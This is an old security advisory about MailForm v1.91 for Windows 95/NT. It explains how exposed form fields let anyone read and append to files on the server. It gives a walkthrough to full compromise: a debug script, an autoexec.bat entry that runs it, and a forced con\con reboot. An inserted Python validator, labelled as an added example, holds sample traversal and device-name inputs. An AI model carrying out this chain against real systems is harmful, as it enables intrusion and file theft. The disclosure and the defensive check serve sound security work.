Advisory: MailForm v1.91 for Windows 95 and NT 4.0
Chopsui-cide[MmM]
The Mad Midget Mafia - http://midgets.box.sk/
=======================================================================
Do not save this with any editor, or _vital_ formatting may be lost.
Disclaimer:
=============
This document is intended as an advisory, and I cannot be held
accountable for its misuse. The reader assumes all responsibility for
his/her use of this information.
Summary:
==========
Date released: 07/04/2000 (dd/mm/yyyy).
Risk: denial of service, reading of private files, appending to
private files, full system compromise if the aforementioned risks
are leveraged properly.
Vulnerability found by: Chopsui-cide
Vulnerable: MailForm v1.91, probably prior versions (not tested).
Immune: ?
MailForm allows potentially dangerous parameters to be specified by
anyone who can execute it. These allow for reading and writing of
files on the system on which MailForm resides.
Details:
==========
Problem fields:
_1_TextLog -
_1_HTMLLog - these two are the ones used to write to files.
_1_MailTemplate - this is what is used to retrieve files.
_1_INIFile - possibly dangerous, but not discussed here.
_1_MailServer - we can just change this to our own address.
_1_MailTo - we don't even need to bother with this.
It's fairly obvious where the problem lies here. We can specify any
file to send + the POP server to send it to. The con\con bug may also
be used to bring down the entire system. Template files will be cut
off at the first null character, so retrieving of binaries is not
practical. Trying to retrieve certain files will cause MailForm to
crash.
A very crude example of how to run code on the remote system is
provided in the last section of this advisory.
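As an added example (not code from the advisory and not MailForm's own code), this is the server-side check a form-to-mail handler should apply to the fields listed above: file fields must resolve inside a fixed directory under Windows path rules, reserved device names such as con are refused, and the mail server must be a known relay. The directory paths, the relay hostname and the sample submissions are constructed placeholders.

```python
import ntpath
import re

# Assumed deployment values (placeholders, not from the advisory).
TEMPLATE_DIR = r"C:\inetpub\mailform\templates"
LOG_DIR = r"C:\inetpub\mailform\logs"
ALLOWED_MAIL_SERVERS = {"mail.example.invalid"}

# Windows reserved device names; con\con is the case the advisory cites.
RESERVED = re.compile(r"^(con|prn|aux|nul|com[1-9]|lpt[1-9])(\..*)?$", re.I)

# Form fields from the advisory that name files, and the only directory
# each may point into.
PATH_FIELDS = {"_1_TextLog": LOG_DIR, "_1_HTMLLog": LOG_DIR,
               "_1_MailTemplate": TEMPLATE_DIR}

def safe_path(base, value):
    """Resolve value under base with Windows path rules; None if unsafe."""
    if not value or "\x00" in value:
        return None
    if any(RESERVED.match(p) for p in re.split(r"[\\/]", value)):
        return None  # a DOS device name anywhere in the path
    full = ntpath.normpath(ntpath.join(base, value))  # absolute input replaces base
    try:
        inside = ntpath.commonpath([base, full]) == base
    except ValueError:  # different drive or UNC share
        inside = False
    return full if inside else None

def check_submission(fields):
    """Return rejection reasons for one submission; an empty list means accept."""
    problems = []
    for name, base in PATH_FIELDS.items():
        if name in fields and safe_path(base, fields[name]) is None:
            problems.append(f"{name}: path rejected ({fields[name]!r})")
    server = fields.get("_1_MailServer")
    if server is not None and server.lower() not in ALLOWED_MAIL_SERVERS:
        problems.append(f"_1_MailServer: {server!r} not an allowed relay")
    return problems

# Constructed sample submissions: one benign, one shaped like the abuse
# described in the advisory (file outside the log/template directories,
# reserved device name, mail sent to a host that is not the local relay).
GOOD_SUBMISSION = {"_1_MailTemplate": "contact.txt", "_1_TextLog": "form.txt",
                   "_1_MailServer": "mail.example.invalid"}
BAD_SUBMISSION = {"_1_MailTemplate": r"..\..\autoexec.bat",
                  "_1_TextLog": r"con\con", "_1_MailServer": "192.0.2.10"}
```

The better fix is to take the log, template and relay settings from server-side configuration and ignore them in the form entirely; the check above is what to enforce if the fields must remain.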
Implementation: web interface
===============================
I have constructed some HTML that allows an attacker to download and
append to files on any remote system running MailForm (cut where it
says [snip], obviously):
[snip]
Web interface for MailForm vulnerabilities.
Do not be alarmed by any "Form submission failed" errors. These are
normal. You will need to modify the form tags in this page to
correspond to the host being attacked.
Download file:
Append to file:
Note: your text will be preceded by garbage.
The Mad Midget Mafia
[snip]
The e-mail will be sent to the host you specify on port 25. It should
be easy enough to capture using netcat.
Implementation: full compromise
=================================
When appending text to files, the following kind of ugly crap
precedes it:
[snip]
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1
Name:
[snip]
Even with this handicap, we can still modify/create batch files.
This is how we will execute code.
The idea here is to create a kind of "script" for debug that will
assemble and execute a small program. It is basically just a list of
keystrokes. We then add an entry to autoexec.bat that executes it.
First we need to upload the following file to c:\windows\script.txt
[snip]
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q
[snip]
Make sure there is _no_ carriage return at the end of each line. Each
line should be terminated by \x0a (linefeed) only. Get rid of the
carriage returns (\x0d), i.e.:
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q
Add a newline (\x0d,\x0a) before the above, and submit the two lines
using the web-based interface.
Add the following line to any batch file that is executed upon start-up
(e.g., autoexec.bat):
debug < c:\windows\script.txt
Check that everything is in order by trying to download both script.txt
and the batch file you modified.
Force a reboot using the con\con vulnerability. Once it restarts, the
code will be executed. I know this is a really ugly hack, but it works
(poor excuse). Also, make sure the garbage doesn't interfere with
anything (always put a newline before the start of your commands).
=======================================================================